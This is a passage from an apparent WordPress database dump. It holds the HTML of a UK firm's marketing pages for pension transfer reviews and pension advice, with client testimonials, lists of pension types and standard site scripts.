href=\"\" target=\"\"><img src=\"/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div>&#13;\n<p/></div></div><div class=\"fullwidth-box\" style=\"background-color:#f4f4f4;background-image:url(http://www.equalitywalk.org.uk/wp-content/uploads/2013/09/Pensions-slide.jpg);background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid #f4f4f4;border-bottom:0px solid #f4f4f4;padding-top:10px;padding-bottom:1px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><div class=\"title\"><h1>Get Your Pension Transfer Review in 4 Easy Steps</h1><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div><div class=\"demo-sep sep-none\" style=\"margin-top:45px;\"/>&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#content-boxes-1 article.col{background-color:#ffffff !important;}\r\n		#content-boxes-1 .fontawesome-icon.circle-yes{color:#ffffff !important;background-color:#afd9a5 !important;border:1px solid #afd9a5 !important;}\r\n		]]></style><section class=\"clearfix columns content-boxes content-boxes-icon-boxed columns-4\" id=\"content-boxes-1\"><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Contact us today</h2></div><div class=\"col-content-container \">Get in touch to find out how we can be of service. It’s confidential and we provide you with the highest level of consumer protection when it comes to pension transfer.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Prepare A Review</h2></div><div class=\"col-content-container \">We’ll get to know you, your specific needs and your financial circumstances to allow us to analyse and report back, allowing you to make better and more informed decisions.</div></article><article class=\"col\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-arrow-right\"/><h2>Explain Options</h2></div><div class=\"col-content-container \">We’ll explain all the options available to you, discuss both the pros &amp;amp; the cons and then make a written recommendation to transfer or not. We have your best interests at heart.</div></article><article class=\"col last\"><div class=\"heading heading-and-icon\"><i class=\"fontawesome-icon medium circle-yes icon-ok\"/><h2>If You Proceed</h2></div><div class=\"col-content-container \">All the paperwork is arranged for you and processed quickly &amp;amp; efficiently. Throughout this process we’ll always be in touch, keeping you in the loop and up to date.</div></article></section><style type=\"text/css\"><![CDATA[#reading-box-container-2 .tagline-shadow:before,#reading-box-container-2 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-2\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#ffffff !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"_blank\" class=\"continue button large default\">Get Advice Now</a><h2>Get Expert Pension Transfer Advice that Makes a True Difference.</h2><p>It\'s free, and we know you\'ll like what you hear.</p><a href=\"/contact-us\" target=\"_blank\" class=\"continue mobile-button button large default\">Get Advice Now</a></section></div></div></div><div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:18px;padding-bottom:20;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<div class=\"one_half\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/>&#13;\n<div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div>&#13;\n<div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\">&#13;\n<div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div>&#13;\n</div>&#13;\n<p/></div><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<div class=\"title\"><h2>We Don’t Rush You Into a Pension Transfer</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>&#13;\n<div class=\"one_third\">&#13;\n<p style=\"text-align: left;\" align=\"center\">I<span style=\"text-align: justify;\">f you own a pension of any kind you may have done well during those “</span><em style=\"text-align: justify; font-family: tahoma, geneva, sans-serif; font-size: small;\">booming economy”</em><span style=\"text-align: justify;\"> years despite having </span>little or no proactive management of your pension<span style=\"text-align: justify;\"> – we know those generous days are over and gone forever.</span></p>&#13;\n<p style=\"text-align: left;\">The secret apathy of so many big named companies of <em>sloppy, wasteful practices</em> has left many people with pensions that are weak, fragile and vulnerable with little or no hope of them meeting their basic income needs – never mind having the money to start enjoying life when they retire!!</p>&#13;\n<p style=\"text-align: left;\">Being in charge of your retirement does mean looking ahead and taking control of it, understanding that something needs change and acting on it. It means determining a structured  plan against clearly defined goals; it means committing to it. It means you retain control as your pensions investment works towards those goals.</p>&#13;\n<p style=\"text-align: left;\">If accurate reliable pension transfer advice sounds like you something you want to know more about – you’re in the right place.</p>&#13;\n<p style=\"text-align: justify;\"/></div><div class=\"two_third last\">&#13;\n<p><span><style type=\"text/css\"><![CDATA[\r\n	#tabs-2,#tabs-2.tabs-vertical .tabs,#tabs-2.tabs-vertical .tab_content{border-color:#ebeaea !important;}\r\n	#main #tabs-2.tabs-horizontal,#tabs-2.tabs-vertical .tab_content,.pyre_tabs .tabs-container{background-color:#ffffff !important;}\r\n	body #tabs-2.shortcode-tabs .tab-hold .tabs li,body.dark #sidebar .tab-hold .tabs li{border-right:1px solid #ffffff !important;}\r\n	body #tabs-2.shortcode-tabs .tab-hold .tabs li:last-child{border-right-width:0 !important;}\r\n	body #tabs-2.shortcode-tabs .tab-hold .tabs li.no-border-right{border-right-width:0 !important;}\r\n	body #main #tabs-2 .tab-hold .tabs li a{background:#ebeaea !important;border-bottom:0 !important;color:#303030 !important;}\r\n	body #main #tabs-2 .tab-hold .tabs li a:hover{background:#ffffff !important;border-bottom:0 !important;}\r\n	body #main #tabs-2 .tab-hold .tabs li.active a,body #main #tabs-2 .tab-hold .tabs li.active{background:#ffffff !important;border-bottom:0 !important;}\r\n	#sidebar .tab-hold .tabs li.active a{border-top-color:#afd9a5 !important;}\r\n	]]></style><div id=\"tabs-2\" class=\"tab-holder shortcode-tabs clearfix tabs-horizontal\"><div class=\"tab-hold tabs-wrapper\"><ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab1\">How We Help</a></li><li><a href=\"#tab2\">Pension Types</a></li><li><a href=\"#tab3\">Pension Planning Review</a></li><li><a href=\"#tab4\"/></li></ul><div class=\"tab-box tabs-container\">&#13;\n<p><span><div id=\"tab1\" class=\"tab tab_content\">&#13;\n<p><span><img class=\"alignright\" alt=\"Portrait of the elderly man. A photo against a dark background\" src=\"/wp-content/uploads/2013/05/elderly-man-m-300x184.jpg\" width=\"245\" height=\"150\"/>Let Our Advice Put You in the Driving Seat and we’ll help you with all your Pension Transfer Options:.</span></p>&#13;\n<ul><li><span>Making the most of your existing pensions</span></li>&#13;\n<li><span>Tracking down missing pensions</span></li>&#13;\n<li><span>Monitoring the performance and cost of your pensions</span></li>&#13;\n<li><span>Combining your existing pensions into one</span></li>&#13;\n<li><span>Advise you on pension transfer timescales</span></li>&#13;\n<li>Advise you pension transfer trust</li>&#13;\n</ul><p><span>Call FREE on  or click the link below to discuss your pension transfer options</span></p></div></span></p>&#13;\n<p><span><div id=\"tab2\" class=\"tab tab_content\"><img class=\"alignright\" alt=\"mature couple sitting on sofa with laptop\" src=\"/wp-content/uploads/2013/05/photodune-2091899-mature-couple-sitting-on-sofa-with-laptop-m1-300x199.jpg\" width=\"239\" height=\"158\"/>Our deep analysis of your current pensions will be your best starting point to make informed decisions about your next best steps. Our Pension Review can help you if you are in&#13;\n<ul><li><span>A Final Salary pension and are looking to transfer – These pensions are sometimes known as a Defined Benefit Scheme.</span></li>&#13;\n<li><span>A Defined Contribution or an Occupational Money Pension. Whereby both you and your employer contribute to your own pension fund.</span></li>&#13;\n<li><span>A Group Personal Pension set up and controlled by you employer with no investment choice or flexibilty</span></li>&#13;\n<li><span>An Executive Pension that may be set up on an older style of higher charges &amp; fees that are eroding your pensions pot</span></li>&#13;\n</ul><p><span>Call FREE on  or click the link below to discuss your pension transfer options</span></p>&#13;\n<p><span/></p></div></span></p>&#13;\n<p><span><div id=\"tab3\" class=\"tab tab_content\"><img class=\"alignright\" alt=\"Couple relaxing in living room and smiling\" src=\"/wp-content/uploads/2016/03/photodune-324747-couple-relaxing-in-living-room-and-smiling-s-300x200.jpg\" width=\"191\" height=\"127\"/>Our FREE Pension review will provide all the answers you seek in comparing the facts and figures to determine if moving your pension pot into another fund is the right decision.&#13;\n<p><span>The performance of different funds can vary significantly and we frequently find that our clients can gain significantly more from their pension by transferring to a different fund. If you have had your pension with the same provider for a while, we would certainly advise you to find out what your options are today. It can make a significant difference!</span></p>&#13;\n<p><span>You should always take specialist independent pension planning advice to help you make the right choice, we will scrutinise all the important pension transfer rules including: </span></p>&#13;\n<ul><li><span>Exit penalties: if they will have any impact on the benefit of moving to a new provider.</span></li>&#13;\n<li><span>Loss of valuable benefits: like improved death benefits for your spouse and family or guaranteed annuity rates when you retire.</span></li>&#13;\n<li><span>Pension transfer cash back : In some instances you may be in a fund that offers protection if electing to take tax free cash that is over 25% – you could lose this benefit if switching to a new provider.</span></li>&#13;\n</ul><p><span>Call FREE on  or click the link below to discuss your options</span></p>&#13;\n<p><span/></p></div></span></p></div></div></div>&#13;\n<style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#f4f4f4 !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"http://www.equalitywalk.org.uk/contact-us/\" target=\"_blank\" class=\"continue button large default\">Get FREE Advice</a><h2>Get Expert Pension Advice that Makes a True Difference.</h2><p>It\'s free, and we know you\'ll like what you hear.</p><a href=\"/contact-us\" target=\"_blank\" class=\"continue mobile-button button large default\">Get FREE Advice</a></section></div></span></p></div><div class=\"clearboth\"/>&#13;\n</div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"/seven-deadly-investment-sins\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/mortgage-strategic-alliance\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/esmart-money-januaryfebruary-2014-issue\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/how-much-money-can-i-get-pension\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/what-does-a-wealth-managerdo\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"/portfolio-items/smart-money-nov-dec\" title=\"Smart Money: Nov-Dec\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/critical-illness-guide\" title=\"Critical Illness Guide\">&#13;\n					</a>&#13;\n						<a href=\"/portfolio-items/guide-auto-enrolment\" title=\"A Guide To Auto Enrolment\">&#13;\n					</a>&#13;\n						<a href=\"/\" title=\"Investing For Income\">&#13;\n					</a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"/feed\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Equity SMART target=\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Pension Transfer Advice','Are you looking to transfer your pension to improve investment returns, reduce charges and costs? Get FREE pension transfer advice today!','publish','closed','closed','','pension-transfer-advice','','','2017-09-21 16:34:37','2017-09-21 16:34:37','',0,'http://www.equalitywalk.org.uk/pension-transfer-advice',0,'page','',0),(94,1,'2017-09-21 16:34:37','2017-09-21 16:34:37','<body bgcolor=\"#ffffff\" onload=\"MM_preloadImages(\'images/investments_r4_c1_f2.jpg\',\'images/investments_r4_c6_f2.jpg\',\'images/investments_r4_c9_f2.jpg\',\'images/investments_r4_c11_f2.jpg\',\'images/investments_r4_c12_f2.jpg\',\'images/investments_r4_c15_f2.jpg\',\'images/investments_r4_c16_f2.jpg\');\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n<div style=\"position:absolute; top:0px; left:50%; margin-left:-475px\">&#13;\n<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"950\"><tr><td><img src=\"../images/spacer.gif\" width=\"10\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"18\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"14\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"49\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"78\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"16\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"30\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"44\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"109\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"118\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"11\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"29\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"138\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"129\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"19\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"1\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\" valign=\"top\" class=\"header\" style=\"background-image:url(../images/index_r1_c1.jpg); background-repeat:no-repeat\"><a href=\"../wealth-management-faqs/\">wealth management FAQs</a> -  <a href=\"../wealth-management-glossary/\">glossary of wealth management terms</a> - <a href=\"../additional/financial-calendar/\">financial calendar</a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"38\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"17\"> </td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"27\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"9\"><a href=\"/\"><img name=\"investments_r3_c1\" src=\"../images/investments_r3_c1.jpg\" width=\"353\" height=\"96\" border=\"0\" id=\"investments_r3_c1\" alt=\"Wealth Management - Financial Advice and Information\" /></a></td>&#13;\n   <td colspan=\"8\" valign=\"top\"><div style=\"font-size:19px; text-align:right; margin-right:30px\">Offices throughout the UK,<br />&#13;\n     call us for expert financial advice - &#13;\n     <span style=\"color:#600\"> <span class=\"adinsightNumber1901\"></span></span>&#13;\n     <script type=\"text/javascript\" src=\"../jsapi.js\"></script><script type=\"text/javascript\"><![CDATA[\r\n  google.load(\'search\', \'1\');\r\n  google.setOnLoadCallback(function() {\r\n    google.search.CustomSearchControl.attachAutoCompletion(\r\n      \'011057125409238421392:utfk3c-gm7e\',\r\n      document.getElementById(\'q\'),\r\n      \'cse-search-box\');\r\n  });\r\n]]></script><form action=\"../search-results/\" id=\"cse-search-box\">&#13;\n  <div>&#13;\n    <input type=\"hidden\" name=\"cx\" value=\"011057125409238421392:utfk3c-gm7e\" /><input type=\"hidden\" name=\"cof\" value=\"FORID:9;NB:1\" /><input type=\"hidden\" name=\"ie\" value=\"UTF-8\" /><input type=\"text\" name=\"q\" id=\"q\" autocomplete=\"on\" size=\"21\" /><input type=\"submit\" name=\"sa\" value=\"Search our Site\" /></div>&#13;\n&#13;\n<script type=\"text/javascript\" src=\"../cse/brand_form_cse-search-box_amp_lang_en_amp_sitesearch_true.js\"></script></form></div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"96\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"5\"><a href=\"/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c1\',\'\',\'images/investments_r4_c1_f2.jpg\',1);\"><img name=\"investments_r4_c1\" src=\"../images/investments_r4_c1.jpg\" width=\"120\" height=\"50\" border=\"0\" id=\"investments_r4_c1\" alt=\"Home Page\" /></a></td>&#13;\n   <td colspan=\"3\"><a href=\"javascript:;\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c6\',\'\',\'images/investments_r4_c6_f2.jpg\',1);\"></a></td>&#13;\n   <td colspan=\"2\"><a href=\"..\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c9\',\'\',\'images/investments_r4_c9_f2.jpg\',1);\"><img name=\"investments_r4_c9\" src=\"../images/investments_r4_c9.jpg\" width=\"153\" height=\"50\" border=\"0\" id=\"investments_r4_c9\" alt=\"Savings &amp; Investments\" /></a></td>&#13;\n   <td><a href=\"../trusts-protection/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c11\',\'\',\'images/investments_r4_c11_f2.jpg\',1);\"><img name=\"investments_r4_c11\" src=\"../images/investments_r4_c11.jpg\" width=\"109\" height=\"50\" border=\"0\" id=\"investments_r4_c11\" alt=\"Trusts and Bonds\" /></a></td> <td colspan=\"3\"><a href=\"../wealth-platform/\" onmouseout=\"MM_swapImgRestore()\" onmouseover=\"MM_swapImage(\'index_r4_c11\',\'\',\'images/index_r4_c11_f2.jpg\',1);\"><img name=\"index_r4_c11\" src=\"../images/index_r4_c11.jpg\" width=\"158\" height=\"50\" border=\"0\" id=\"index_r4_c11\" alt=\"Wealth Management\" /></a></td>&#13;\n   <td><a href=\"../about-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c15\',\'\',\'images/investments_r4_c15_f2.jpg\',1);\"><img name=\"investments_r4_c15\" src=\"../images/investments_r4_c15.jpg\" width=\"138\" height=\"50\" border=\"0\" id=\"investments_r4_c15\" alt=\"About Us\" /></a></td>&#13;\n   <td colspan=\"2\"><a href=\"../contact-us/\" onmouseout=\"MM_swapImgRestore();\" onmouseover=\"MM_swapImage(\'investments_r4_c16\',\'\',\'images/investments_r4_c16_f2.jpg\',1);\"><img name=\"investments_r4_c16\" src=\"../images/investments_r4_c16.jpg\" width=\"148\" height=\"50\" border=\"0\" id=\"investments_r4_c16\" alt=\"Contact Us\" /></a></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"50\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td rowspan=\"9\"><img name=\"investments_r5_c1\" src=\"../images/investments_r5_c1.jpg\" width=\"10\" height=\"545\" border=\"0\" id=\"investments_r5_c1\" alt=\"\" /></td>&#13;\n   <td colspan=\"15\"><div id=\"breadcrumb\"><a href=\"/\">home</a> &gt; pension advice</div><h1>Pension Advice</h1>      </td>&#13;\n   <td rowspan=\"4\"><img name=\"investments_r5_c17\" src=\"../images/investments_r5_c17.jpg\" width=\"19\" height=\"260\" border=\"0\" id=\"investments_r5_c17\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"63\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"6\"><img name=\"investments_r6_c2\" src=\"../images/investments_r6_c2.jpg\" width=\"204\" height=\"9\" border=\"0\" id=\"investments_r6_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"9\" rowspan=\"8\" valign=\"top\">     <div class=\"paracontent2\">&#13;\n     <p>While the prospect of retirement may be thrilling for some, it may make others uneasy. Why? It depends on how well you have prepared.</p>&#13;\n     <p>At present there are  tax incentives on offer for pension planning, which everyone should take  advantage of, including those few who are wealthy enough not to worry about  their retirement income.<br /><br />&#13;\n       Equity SMART set very high service standards and  pride ourselves on building a very strong relationship with our clients. We\'re  one of the UK\'s leading independent financial service providers and pension  management specialists. </p>&#13;\n     <p>Our aim is to help investors make more of their savings  &amp; <a href=\"..\">investments</a> by providing them with all the support they need, from the  first fact finding meeting, through the research &amp; report process, to the  presentation of our pension advice. This is carefully managed together with the  support of the most up to date technology assisting us</p>&#13;\n<div align=\"center\" style=\"padding-top:12px\"><img src=\"../images/go-button.gif\" width=\"550\" height=\"66\" alt=\"Pension Advice\" /></div>&#13;\n     </div></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"9\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"2\" rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c2\" src=\"../images/investments_r7_c2.jpg\" width=\"32\" height=\"453\" border=\"0\" id=\"investments_r7_c2\" alt=\"\" /></td>&#13;\n   <td colspan=\"3\" valign=\"top\" class=\"related\" style=\"background-image:url(../images/investments_r7_c4.jpg); background-repeat:no-repeat\">Related Pages</td>&#13;\n   <td rowspan=\"7\" valign=\"top\"><img name=\"investments_r7_c7\" src=\"../images/investments_r7_c7.jpg\" width=\"16\" height=\"453\" border=\"0\" id=\"investments_r7_c7\" alt=\"\" /></td>&#13;\n   <td><img src=\"../images/spacer.gif\" width=\"1\" height=\"34\" border=\"0\" alt=\"\" /></td>&#13;\n  </tr><tr><td colspan=\"3\" rowspan=\"5\" valign=\"top\" style=\"background-image:url(../images/investments_r13_c4.jpg); background-position:bottom; background-repeat:no-repeat\" class=\"relatedlinks\"><a href=\"../pensions/occupational-pensions/\" title=\"Occupational Pensions\">&#13;\n     </a><a href=\"../pensions/sipps/\">SIPP\'s</a> <br />&#13;\n     the pension where you\'re the contributor &amp;  investor<br /><br /><a href=\"../pensions/occupational-pensions/\">Occupational Pension </a> <br />&#13;\n     employer pension plan<br /><br /><a href=\"/\">Personal Pension</a> <br />&#13;\n     choose the right pension<a href=\"../pensions/pension-release/\"><br /><br />&#13;\n       Pension Release</a> <br />&#13;\n     release cash early<br /><br /><a href=\"/\">Stakeholder Pension</a> <br />&#13;\n     low cost  pension plan <br /><br /><a href=\"/\">Group Pension Plan</a> <br />&#13;\n     company pension plan&#13;\n  <p><a href=\"../pensions/auto-enrolment-pensions/\">Auto Enrolment Pensions</a> <br />&#13;\n    find out the basics</p>&#13;\n  <p><a 